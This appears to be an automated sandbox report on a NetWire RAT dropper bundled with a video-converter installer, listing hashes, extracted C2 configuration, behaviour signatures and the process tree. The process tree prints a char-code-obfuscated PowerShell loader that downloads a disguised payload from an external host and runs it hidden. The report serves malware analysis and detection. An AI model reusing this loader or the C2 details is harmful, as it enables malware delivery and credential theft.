Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
22-12-2024 05:05
General
-
Target
784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
-
Size
41.4MB
-
MD5
718ed13004aee0ac798c8ba3a6a611b1
-
SHA1
d4e03ba4ed89c82a50f4b0286b41ccba5c2fbe26
-
SHA256
784219977ec25385fa9ebba5e4f7bd26f9807a7695b9bb3ba5fb910cab8061be
-
SHA512
ee06e514905c642bc772f5a38408bac22da3ec82920aa346d374cd7a6c3f64f178bfaa7a6273c820e7dd82ec8cafe8dbd45685c9e68e710f3a0a4b400b1c2c69
-
SSDEEP
786432:cIVnXbLTKsTSBIildiswnDD5fuksujJi9gGGDFYUzgzZrBevOJ4j2QGwcrgbW:1VsI+5EfJsG09sFYUzk8vOJ8gwcrSW
Malware Config
Extracted
https://i.top4top.io/m_1891i29ay1.mp4
Extracted
netwire
alice2019.myftp.biz:3360
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
FRAPPE2021
-
lock_executable
false
-
offline_keylogger
false
-
password
Password
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 2 IoCs
-
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
-
Netwire family
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe"C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS14⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2ba0z0q\z2ba0z0q.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEABE.tmp" "c:\Users\Admin\AppData\Local\Temp\z2ba0z0q\CSC4DDEC263EC854BD5AF9C5F98DBFACCB.TMP"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-4FQGR.tmp\avc-ultimate.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FQGR.tmp\avc-ultimate.tmp" /SL5="$602BA,42677709,137216,C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41.3MB
MD5b33141c0cc6f9fa0ce2e9d927f6710ca
SHA13245dda9dd7cb826469941fde7c41a09e283ffc0
SHA256e6891c2c2fd45f118d60044edcf66d394141ea572bfb27d8686e1bc9b36020b1
SHA5120a91e819540575c729cd62e361cd39bbc3b81b29b68606e035a000761304c85f36a8941c0de2305f741f17f32efd7ababa9d5bea277f0f35bb454fa6a6addb0c
-
Filesize
2KB
MD59124e0eaa9674951a92d70093ede08b9
SHA15cee26e3f688f83dce0512efbc4554129323a318
SHA2562eb194bb2d884725ab8bc85355d7d842be3a3c331d9ed38d52e983b3e1bb5b16
SHA512273c576789ffe16a80593fe9059611ab5bc28ea76c73ae28ae654760e863b30209812ec4f406b59e3f4c6571e6f9de6184b6241e4f24c026da97e7b329e824cb
-
Filesize
17KB
MD5618bc9e069b80c83bf198f1d3bb91d77
SHA160898977fb4d377ce6d7559cac274df30a611eef
SHA256da4fe36dd1fb1fdd2d549494d268fb8b7d01ea0baaaf8c7ee718ddc84f0b79ec
SHA51269bba6dcd5743512145d3b44a1d7dac1aeae4716ef28586a95012769c97f6bd973c0173aa7fd0dcb05b69579a3bf81d1fc7d17f0768a07ea2607c700ea74e297
-
Filesize
1.3MB
MD591f0120c96e48e31d29f0a5d5507866c
SHA1ca3ae973ebb1861de17a8659b0f0de86d384f4b6
SHA25634f0b712e91636e228a516fa5f6e0ef6d819b96cadcf959a7ab11e343b6f8e00
SHA5125099911ca8d3bc5552bb4ff543e0b5d128a6c090625c1cd4cc43f4f1b3b6dd1b717f30f67cc951fcaa52fdd25ef0f588eccbdc86798364c714923d0278304f2c
-
Filesize
1KB
MD563689f161db1db71f78c8d57f01c7af3
SHA191d6dd59e756e7550e1858ea1d6e58a9d8d70d55
SHA256bc1e7efebc18d44343101262630dc81e9b0f5a63dc6937be28a881de74105734
SHA512f1cb40a89e6b3fe9070a5074898352c5ca7f648c7851b1458aeaba4c9f812f7289d9e88c2913e8cfcbc9bd73739e7bff72432981fa7a10c3a5477d5aec3bc1ec
-
Filesize
232KB
MD57e9a5c74501529c97a0675dc7d3e36cc
SHA1c090ead740db008ed6bb1832c31065911103e349
SHA256c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157
SHA51281dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD57fffc9d80d54551bc786b91137a1a960
SHA19302425c93c4eaa2f0b41fbfebe817fed6c4f240
SHA2564bec5b6b36528b46e18ba64efbf734ee25cceec0d2e8ebb22e097f208a9ea1a4
SHA512d37224ac1c0ed77da336673e6ee204424ed4ab05aa952c521f920dc134780fd48d8a58f9b78aac3e729e5a597705e6b4e642f2602c2d664776f2edef93abe584
-
Filesize
1.6MB
MD521f9e77769bca6b8b187b787f3c3086b
SHA1816ef51f7e1523860cc98987e5a28d98eaa61ce0
SHA256709e63042f882160ddab316475616eb47ff027eb92d898318a242b786dda9fe3
SHA51242ab4e668a8484136933161c71d9b80a640ab6a96090be45cd6dfd7764b863e907dacffc46a09dbdfb483093f62482a848e976367f166690b765ea15ea814a67
-
Filesize
88KB
MD50f66c9c3fde3db6e543ebbb49099b626
SHA1d2ff83a28a07445496c99588de510c6c92d4a08e
SHA25652a90531785f52b37efb59444712054e3b5748a4213d4af31728718f55962702
SHA512f56dbcb2b436c8054849044126b020ed0318dd760561154bd8b4a99dea83197c0dce24107daee9e73c47702fac5c1df0086cc3f080f64b883eadb66679652260
-
Filesize
13KB
MD58014f704f8bbf6c5f3e5596556a279e3
SHA1b636b7b3b5ac790c0773bcafc4c41a9191b2bfec
SHA25615afc9d4b929b13fca68f153b7d71ac2602e8b1a7a2a584a548e015656ca60f0
SHA5128806650c9f47c87d5402c81d05ec81e0330cbf18663fd4d66814bc4c435aa9a4b63b534d6596e4e31c3deb34da9722dff021e9b74b7c57ee8c9fda4eff9c52bc
-
Filesize
153KB
MD52591c7f4c1ebca785ccb7c074f66782a
SHA1080fa10f63666f48ed0136eb6dfbe5b914292668
SHA256d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec
SHA512658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6
-
Filesize
652B
MD5a4fc920e03ae2995a832f0f284be59c5
SHA197de7fa7e3a5403bc37faed26c57e6c76c628a81
SHA25601d2ff501b94f20fadebd56d8ded81f80174cd008d162e7a3c56f48c9b2adcc7
SHA512955965195eca39afbfc39e8b785abc9cfddf005c84218107c1a798d9d4af56224c4a83b5b831817fbbb57a38ffe9e7ede8f8ec52f900f469f96462763ddf359f
-
Filesize
13KB
MD5e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
Filesize
327B
MD546d5fa2b97182e1344aa8aa0a7e24fda
SHA1f166e75a37212a52fe2597973588990c4cd6c5f1
SHA256624f61765698ef34bbf6b07e8aa042cfbab611e6eeeec0bf3580d8c940fab74c
SHA5126bb455c40b909b89e8bcbe66ebb6c838921b68e41763c7adad45f16f952d5e6c2a6ead439e632b26bf30f8b41f6fb382ebf05402187c0f370271399ecbb5c579
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
40KB
-
Filesize
5.6MB
-
Filesize
472KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
6.5MB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
200KB